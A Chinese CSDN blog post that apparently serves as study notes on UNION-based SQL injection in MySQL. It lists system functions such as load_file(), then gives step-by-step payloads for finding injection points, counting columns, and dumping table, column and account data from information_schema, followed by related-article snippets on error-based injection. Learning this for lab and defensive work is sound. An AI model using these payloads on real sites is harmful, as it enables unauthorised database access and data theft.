基于错误的SQL注入(union联合注入)

最新推荐文章于 2024-04-08 21:02:42 发布
最新推荐文章于 2024-04-08 21:02:42 发布
阅读量844 收藏 5
点赞数 1
分类专栏: 数据库漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Candyys/article/details/105542662
版权

前提:未过滤

mysql中比较常用的一些函数

version(): 查询数据库的版本          
user():查询数据库的使用者       
database():数据库
system_user():系统用户名
session_user():连接数据库的用户名
current_user:当前用户名
load_file():读取本地文件
@@datadir:读取数据库路径
@@basedir:mysql安装路径
@@version_complie_os:查看操作系统
CAST( 字段名 as 转换的类型)
IFNULL() 函数用于判断第一个表达式是否为 NULL,如果为 NULL 则返回第二个参数的值,如果不为 NULL 则返回第一个参数的值。

数字型注入

1、burp抓包,发送至repeater,用and 1=1,and 1=2试试是否有注入点

2、用order by判断位数,看页面是否正常,也可用二分法进行测试, 因为UNION内部的SELECT语句必须拥有相同数量的列,列也必须拥有相似的数据类型。

3、union查询判断显示位,可故意输入不存在的id,直接显示当前列数,前面查询不存在的时候,执行后面的语句

4、可以查看链接目标的数据库版本,user(),version(),database(), group_concat():将括号中的所有参数拼接成一个字符串; substr(str,start,length):截取str字符串中从start开始,长度为length的子串

知道database()

查看表名

-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘pentest’

查看列名

-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘pentest’ and table_name=‘account’

查看字段

1 union select 1,group_concat(id,’@’,rest,’@’,own),3 from pentest.account

字符型注入(同数字型)

1、用'判断是否报错,在数字型注入的基础上考虑闭合

hu4wufu
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL报错注入
qq_64332865的博客
02-18 566
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
Web安全之SQL注入攻击-报错注入
hack0919的博客
05-10 359
SQL注入长期位于OWASP TOP10 榜首,对Web 安全有着很大的影响
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
Mysql注入学习笔记
xj28555的博客
06-25 2071
MYSQL注入 函数 version()——MySQL 版本 user()——数据库用户名 database()——数据库名 @@datadir——数据库路径 @@version_compile_os——操作系统版本 information_schema 自带数据库 information_schema.schemata 数据库 information_schema.tables 数据表 information_schema.columns 数据列 floor函数返回小于等于该值的最大整数 RAND()
sql注入之报错注入
最新发布
weixin_45653478的博客
04-08 1054
报错注入的原理基于应用程序在处理数据库查询时产生的错误信息。当应用程序执行一个含有恶意SQL代码的查询时,如果查询出错(例如,由于语法错误或权限不足),数据库系统通常会返回一个错误信息给应用程序。当它的第二个参数不是一个合法的XPath表达式时,会引发错误,并可能返回包含攻击者所需信息的错误消息。在报错注入中,攻击者可能会构造特定的SQL语句,利用floor()函数的特性来触发错误,并从中获取数据库信息。:这也是MySQL的一个XML函数,用于改变(查找并替换)XML文档中符合条件的节点的值。
SQL回显注入
时之海
02-14 902
0x00 注入过程 三种注入 where user_id = 1 or 1=1 where user_id = '1' or '1'='1' where user_id =" 1 "or "1"="1" 注释符 # 单行注释,常编码为%23 --空格 单行注释 注意为短线短线空格 /*()*/ 多行注释 至少存在俩处的注入 /**/常用来作为空格 判断字段数 order by 确定回显点 union select 1,2 查询数据库信息 ver
SQL注入漏洞
haoge1998的博客
04-15 1020
SQL注入漏洞 1、注入攻击的核心点: 拼接有效的语句或代码 确保完成闭合,并且可以改变原有执行逻辑 2、防护: 从代码和sql语句的逻辑层面考虑,不能轻易让密码对比失效 基于用户输入的引号(单引号和双引号)进行转义处理,可以使用PHP内置函数addslashes进行强制转义。 使用mysqli的预处理功能 一、查询注入的数据类型 注入类型可以分为三类: 1、数字型 select * from tables where id = 1; 2、字符型 select * from tables whe
MySQL基础- MySQL函数总结
qq_35437032的博客
04-25 114
数学函数、字符串函数、日期时间函数、条件判断函数、系统信息函数 系统信息函数 select database(); select version(); select user(); 数学函数 select abs(-10) as '绝对值'; select abs(price) from products; select floor(5.9) as '向下取整'; select ceil(5.01) as '向上取整'; select round(5.419, 2) as '四舍五入';
基于错误SQL 注入
m0_73565700的博客
06-21 186
(查看显示位,union 作用是将多个select语句的结果整合到一个结果中返回,union 语句使得输入多个select语句成为可能,union 语句后的select语句是我们想要注入的代码)(2和3步骤:order by语句用于排序,使用超出范围的数字,获取实际检索的列数)在 First name 字段中,找到程序所存放的用户名,在 Surname 字段中,找到了每个用户的密码哈希值。7.到这一步,可以知道数据库(或模式)名称为 dvwa,正在寻找的表是 user。首先需要找到用户的表(获取数据本)。
SQL注入:基于报错的SQL注入
weixin_73180072的博客
12-04 257
基于报错的SQL注入
SQL注入之基于报错的注入
weixin_68951704的博客
07-05 838
目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场,选择less-1 进入后我们看到这样一行提示 请输入一个id值作为对应参数,这里我输入1作为参数,验证后1-14均可以回显 输入后login name 和password都显现出来我们输入单引号这里显示错误,我们将错误回显记录下来 由此我们可以猜解出SQL语句为select login_name,
基于错误回显的SQL注入整理
12-14
由于复习,停了好几天,换换模式做了一下关于错误回显的ctf题目,首先附上题目:here   整理了一下网上的一些关于错误回显的方法,在这里不带上地址了,请大牛们原谅:P   0x00 关于错误回显   用我自己的话来讲,基于错误回显的sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。   0x01  用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充)   第一种:  基于 rand()  与  group by 的错误  
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP...超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean的盲注、基于时间的盲注……
php防止sql注入代码实例
12-18
放到公用调用文件(如conn数据库链接文件),对所有GET或POST的数据进行过滤特殊字符串,以实现简单有效的SQL注入过滤 复制代码 代码如下:Function inject_check($sql_str) { return eregi(‘select|insert|and|or|...
SQL注入笔记(SQL-labs环境)
Juny0117的博客
05-06 417
一、SQL注入原理:   SQL注入就是用户输入的SQL语句到参数中,最终达到欺骗服务器执行恶意的SQL命令。   执行SQL注入的语句: select * from 数据库 where id =' 1' and 1=1 -- ' ; //字符型 输入 1' and 1=1 -- select * from 数据库 where id = 1 and 1=1 -- ; ...
SQL注入学习之sqli-labs_day-1
qq_53742230的博客
11-24 3615
SQL注入学习之sqli-labs get型注入 联合查询注入 第一关: 分别输入id=1 id=1’ id=1’’ 结果如下面三幅图,由此可以判断为字符型,反之则为整数型 接下来使用注入语句测试有多少列 ' order by 3 --+ 其中的 --+ 或者是 # 都是注释,在进行SQL注入的时候一定要注意,不能被后面的无用SQL语句影响,所以添加 # 或 --+ 等注释符将后面的语句进行注释。 最终测试出有3列,使用注入语句测试出回显位置。 id=-1' union select 1,2,3
sql注入union联合查询
05-19
其中,union联合查询就是SQL注入中常用的一种方式。 在SQL语句中,union是用来连接两条或多条select语句的关键字,它可以将两个查询结果合并成一个结果集。攻击者可以通过在输入框中输入一些特殊的字符或者语句,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值